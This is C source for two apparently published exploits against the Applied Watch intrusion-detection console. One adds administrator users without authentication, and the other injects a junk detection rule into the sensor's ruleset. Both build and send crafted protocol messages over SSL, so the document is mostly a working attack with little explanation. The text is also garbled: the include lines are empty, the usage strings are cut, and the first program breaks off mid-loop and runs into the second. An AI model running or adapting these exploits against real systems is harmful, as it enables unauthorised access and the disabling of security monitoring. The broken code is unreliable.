// appliedsnatch.c : a malicious individual on a network protected by
// the Applied Watch Solution can add new users to a console,
// without having to authenticate to the system.
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PUT_UINT32(i, val)\
{\
buf[(i) ++] = ((val) >> 24) & 0xff;\
buf[(i) ++] = ((val) >> 16) & 0xff;\
buf[(i) ++] = ((val) >> 8) & 0xff;\
buf[(i) ++] = (val) & 0xff;\
}
int main(int argc, char *argv[])
{
unsigned char *buf;
unsigned int idx, i;
size_t userlen, passlen, buflen, lenidx;
int sock;
struct sockaddr_in sin;
unsigned char respbuf[28];
ssize_t n;
SSL_CTX *sslctx;
SSL *ssl;
if (argc != 5) { fprintf(stderr, "usage: %s \n",
argv[0]); exit(1); }
userlen = strlen(argv[3]);
passlen = strlen(argv[4]);
buf = malloc(buflen = 12 + 4 + userlen + 4 + 4 + passlen + 4 + 4 + 4);
memset(buf, 0, buflen);
idx = 0;
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
PUT_UINT32(idx, 0x6a);
lenidx = idx;
PUT_UINT32(idx, 0xf00fc7c8);
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
PUT_UINT32(idx, userlen);
memcpy(&buf[idx], argv[3], userlen); idx += userlen;
idx |= 3; idx ++;
PUT_UINT32(idx, passlen);
memcpy(&buf[idx], argv[4], passlen); idx += passlen;
idx |= 3; idx ++;
PUT_UINT32(idx, 0x1);
PUT_UINT32(idx, 0x1);
PUT_UINT32(lenidx, idx);
printf("connecting\n");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
{
struct hostent *he;
if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()");
exit(1); }
memcpy(&sin.sin_addr, he->h_addr, 4);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
perror("connect()"); exit(1); }
printf("doing ssl handshake\n");
SSL_load_error_strings();
SSL_library_init();
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr,
"SSL_CTX_new()\n"); exit(1); }
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n");
exit(1); }
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1);
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
printf("sending %u bytes:\n", idx);
for (i = 0; i
#include
#include
#include
#include
#include
#include
#include
#include
#define PUT_UINT32(i, val)\
{\
buf[(i) ++] = ((val) >> 24) & 0xff;\
buf[(i) ++] = ((val) >> 16) & 0xff;\
buf[(i) ++] = ((val) >> 8) & 0xff;\
buf[(i) ++] = (val) & 0xff;\
}
int main(int argc, char *argv[])
{
unsigned char *buf;
unsigned int idx, i;
size_t rulelen, buflen, lenidx;
int sock;
struct sockaddr_in sin;
unsigned char respbuf[28];
ssize_t n;
SSL_CTX *sslctx;
SSL *ssl;
unsigned char *ruleset = "alert tcp any any -> any any (msg: \"*GOBBLE*
*GOBBLE* *GOBBLE* *GOBBLE* \\:PpppppPPppppppPPPPPPpppp\";)";
if (argc != 3) { fprintf(stderr, "usage: %s \n", argv[0]);
exit(1); }
rulelen = strlen(ruleset);
buf = malloc(buflen = 12 + 4 + 4 + 4 + rulelen + 4);
memset(buf, 0, buflen);
idx = 0;
PUT_UINT32(idx, 0xbabe0001); /* 0xbabe0002 for other protocol ver */
PUT_UINT32(idx, 0x6f);
lenidx = idx;
PUT_UINT32(idx, 0xf00fc7c8);
//PUT_UINT32(idx, 0); /* uncomment for other protocol ver */
PUT_UINT32(idx, 0);
PUT_UINT32(idx, 1);
PUT_UINT32(idx, rulelen);
memcpy(&buf[idx], ruleset, rulelen); idx += rulelen;
idx |= 3; idx ++;
PUT_UINT32(lenidx, idx);
printf("connecting\n");
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = htons(atoi(argv[2]));
if ((sin.sin_addr.s_addr = inet_addr(argv[1])) == -1)
{
struct hostent *he;
if ((he = gethostbyname(argv[1])) == NULL) { perror("gethostbyname()");
exit(1); }
memcpy(&sin.sin_addr, he->h_addr, 4);
}
sock = socket(AF_INET, SOCK_STREAM, 0);
if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
perror("connect()"); exit(1); }
printf("doing ssl handshake\n");
SSL_load_error_strings();
SSL_library_init();
if ((sslctx = SSL_CTX_new(SSLv23_client_method())) == NULL) { fprintf(stderr,
"SSL_CTX_new()\n"); exit(1); }
if ((ssl = SSL_new(sslctx)) == NULL) { fprintf(stderr, "SSL_new()\n");
exit(1); }
if (SSL_set_fd(ssl, sock) != 1) { fprintf(stderr, "SSL_set_fd()\n"); exit(1);
if (SSL_connect(ssl) != 1) { fprintf(stderr, "SSL_connect()\n"); exit(1); }
printf("sending %u bytes:\n", idx);
for (i = 0; i
